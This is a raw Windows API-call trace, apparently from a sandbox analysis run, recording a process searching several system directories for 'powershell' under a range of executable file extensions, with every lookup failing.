	[0815.151] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.151] SetErrorMode (uMode=0x1) returned 0x1
	[0815.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.152] SetErrorMode (uMode=0x1) returned 0x1
	[0815.152] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.152] SetErrorMode (uMode=0x1) returned 0x1
	[0815.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.152] SetErrorMode (uMode=0x1) returned 0x1
	[0815.152] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.153] SetErrorMode (uMode=0x1) returned 0x1
	[0815.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.153] SetErrorMode (uMode=0x1) returned 0x1
	[0815.153] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.153] SetErrorMode (uMode=0x1) returned 0x1
	[0815.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.154] SetErrorMode (uMode=0x1) returned 0x1
	[0815.154] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.154] SetErrorMode (uMode=0x1) returned 0x1
	[0815.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.154] SetErrorMode (uMode=0x1) returned 0x1
	[0815.154] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.155] SetErrorMode (uMode=0x1) returned 0x1
	[0815.155] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.155] SetErrorMode (uMode=0x1) returned 0x1
	[0815.155] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.155] SetErrorMode (uMode=0x1) returned 0x1
	[0815.156] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.156] SetErrorMode (uMode=0x1) returned 0x1
	[0815.156] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.156] SetErrorMode (uMode=0x1) returned 0x1
	[0815.156] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.156] SetErrorMode (uMode=0x1) returned 0x1
	[0815.157] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.157] SetErrorMode (uMode=0x1) returned 0x1
	[0815.157] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.157] SetErrorMode (uMode=0x1) returned 0x1
	[0815.157] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.157] SetErrorMode (uMode=0x1) returned 0x1
	[0815.158] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.158] SetErrorMode (uMode=0x1) returned 0x1
	[0815.158] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.158] SetErrorMode (uMode=0x1) returned 0x1
	[0815.158] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.158] SetErrorMode (uMode=0x1) returned 0x1
	[0815.159] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.159] SetErrorMode (uMode=0x1) returned 0x1
	[0815.159] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.159] SetErrorMode (uMode=0x1) returned 0x1
	[0815.159] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.159] SetErrorMode (uMode=0x1) returned 0x1
	[0815.160] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.160] SetErrorMode (uMode=0x1) returned 0x1
	[0815.160] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.160] SetErrorMode (uMode=0x1) returned 0x1
	[0815.160] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.161] SetErrorMode (uMode=0x1) returned 0x1
	[0815.161] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.161] SetErrorMode (uMode=0x1) returned 0x1
	[0815.161] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.161] SetErrorMode (uMode=0x1) returned 0x1
	[0815.161] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.162] SetErrorMode (uMode=0x1) returned 0x1
	[0815.162] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.162] SetErrorMode (uMode=0x1) returned 0x1
	[0815.162] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.162] SetErrorMode (uMode=0x1) returned 0x1
	[0815.163] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.163] SetErrorMode (uMode=0x1) returned 0x1
	[0815.163] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.163] SetErrorMode (uMode=0x1) returned 0x1
	[0815.163] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.164] SetErrorMode (uMode=0x1) returned 0x1
	[0815.164] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.164] SetErrorMode (uMode=0x1) returned 0x1
	[0815.164] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.164] SetErrorMode (uMode=0x1) returned 0x1
	[0815.164] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.165] SetErrorMode (uMode=0x1) returned 0x1
	[0815.165] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.165] SetErrorMode (uMode=0x1) returned 0x1
	[0815.165] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.165] SetErrorMode (uMode=0x1) returned 0x1
	[0815.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.166] SetErrorMode (uMode=0x1) returned 0x1
	[0815.166] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.166] SetErrorMode (uMode=0x1) returned 0x1
	[0815.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.179] SetErrorMode (uMode=0x1) returned 0x1
	[0815.179] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.179] SetErrorMode (uMode=0x1) returned 0x1
	[0815.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.180] SetErrorMode (uMode=0x1) returned 0x1
	[0815.180] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.180] SetErrorMode (uMode=0x1) returned 0x1
	[0815.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.180] SetErrorMode (uMode=0x1) returned 0x1
	[0815.180] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.181] SetErrorMode (uMode=0x1) returned 0x1
	[0815.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.181] SetErrorMode (uMode=0x1) returned 0x1
	[0815.181] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.181] SetErrorMode (uMode=0x1) returned 0x1
	[0815.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.182] SetErrorMode (uMode=0x1) returned 0x1
	[0815.182] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.182] SetErrorMode (uMode=0x1) returned 0x1
	[0815.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.183] SetErrorMode (uMode=0x1) returned 0x1
	[0815.183] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.183] SetErrorMode (uMode=0x1) returned 0x1
	[0815.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.183] SetErrorMode (uMode=0x1) returned 0x1
	[0815.183] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.184] SetErrorMode (uMode=0x1) returned 0x1
	[0815.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.184] SetErrorMode (uMode=0x1) returned 0x1
	[0815.184] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.184] SetErrorMode (uMode=0x1) returned 0x1
	[0815.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.185] SetErrorMode (uMode=0x1) returned 0x1
	[0815.185] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.185] SetErrorMode (uMode=0x1) returned 0x1
